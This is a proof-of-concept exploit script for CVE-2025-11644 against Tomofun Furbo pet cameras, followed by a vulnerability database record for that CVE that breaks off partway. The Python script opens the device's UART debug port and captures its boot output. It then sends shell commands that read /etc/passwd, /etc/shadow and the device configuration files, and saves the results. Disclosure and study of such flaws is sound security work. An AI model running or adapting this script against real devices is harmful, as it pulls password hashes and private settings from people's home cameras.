CVE-2025-11644

# CVE-2025-11644 - Furbo UART Interface Sensitive Information Disclosure PoC # This PoC demonstrates how to connect to the UART interface of Tomofun Furbo 360/Mini # to extract sensitive information stored on the device. import serial import time # UART configuration - typical settings for embedded device debug interfaces UART_PORT = '/dev/ttyUSB0' # Adjust based on your USB-to-TTL adapter BAUD_RATE = 115200 # Common baud rate for embedded devices TIMEOUT = 2 # Read timeout in seconds def connect_to_uart(port, baudrate, timeout): """ Establish a serial connection to the Furbo device's UART interface. Requires physical access to the device's debug pins. """ try: ser = serial.Serial( port=port, baudrate=baudrate, bytesize=serial.EIGHTBITS, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, timeout=timeout ) print(f"[+] Connected to UART on {port} at {baudrate} baud") return ser except serial.SerialException as e: print(f"[-] Failed to connect: {e}") return None def read_boot_output(ser, duration=5): """ Capture boot-time output which may contain sensitive information. """ print(f"[*] Capturing boot output for {duration} seconds...") start_time = time.time() captured_data = b"" while time.time() - start_time < duration: if ser.in_waiting > 0: data = ser.read(ser.in_waiting) captured_data += data return captured_data def attempt_filesystem_access(ser): """ Attempt to access the device filesystem through UART shell. """ commands = [ b"\n", # Try to get a shell prompt b"id\n", # Check current user b"cat /etc/passwd\n", # Read user accounts b"cat /etc/shadow\n", # Read password hashes b"ls /data/\n", # List data directory b"cat /data/config/*\n", # Read configuration files b"ifconfig\n", # Network configuration b"cat /proc/cmdline\n", # Kernel command line ] output = b"" for cmd in commands: ser.write(cmd) time.sleep(1) if ser.in_waiting > 0: output += ser.read(ser.in_waiting) return output def main(): print("=" * 60) print("CVE-2025-11644 - Furbo UART Information Disclosure PoC") print("Target: Tomofun Furbo 360 / Furbo Mini") print("=" * 60) # Step 1: Connect to UART ser = connect_to_uart(UART_PORT, BAUD_RATE, TIMEOUT) if not ser: return # Step 2: Capture boot output boot_data = read_boot_output(ser, duration=10) print(f"[+] Captured {len(boot_data)} bytes of boot data") # Step 3: Attempt to access sensitive information fs_data = attempt_filesystem_access(ser) print(f"[+] Captured {len(fs_data)} bytes of filesystem data") # Step 4: Save captured data for analysis with open("furbo_uart_capture.bin", "wb") as f: f.write(boot_data + fs_data) print("[+] Data saved to furbo_uart_capture.bin") ser.close() print("[+] Connection closed") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-11644", "sourceIdentifier": "[email protected]", "published": "2025-10-12T20:15:39.713", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in Tomofun Furbo 360 and Furbo Mini. Affected by this issue is some unknown functionality of the component UART Interface. Executing manipulation can lead to insecure storage of sensitive information. The physical device can be targeted for the attack. This attack is characterized by high complexity. The exploitation is known to be difficult. The firmware versions determined to be affected are Furbo 360 up to FB0035_FW_036 and Furbo Mini up to MC0020_FW_074. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:P/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 0.3, "baseSeverity": "LOW", "attackVector": "PHYSICAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "PHYSICAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.5, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.2, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.5, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:H/Au:N/C:P/I:N/A:N", "baseScore": 1.2, "accessVector": "LOCAL", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 1.9, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-922"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-922"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:furbo:furbo_mini_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "074", "matchCriteriaId": "06B19876-699B-455F-945F-AF26C60BF965"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:furbo:furbo_mini:-:*:*:*:*:*:*:*", "matchCriteriaId": "7F549356-AF78-447C-8689-D9DD1A9202DC"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:furbo:furbo_360_dog_camera_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "036", "matchCriteriaId": "6DDA1333-73CD-494A-8DD3-9543FDFD47A7"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:furbo:furbo_360_dog_camera:*:*:*:*:*:*:*:*", " ... (truncated)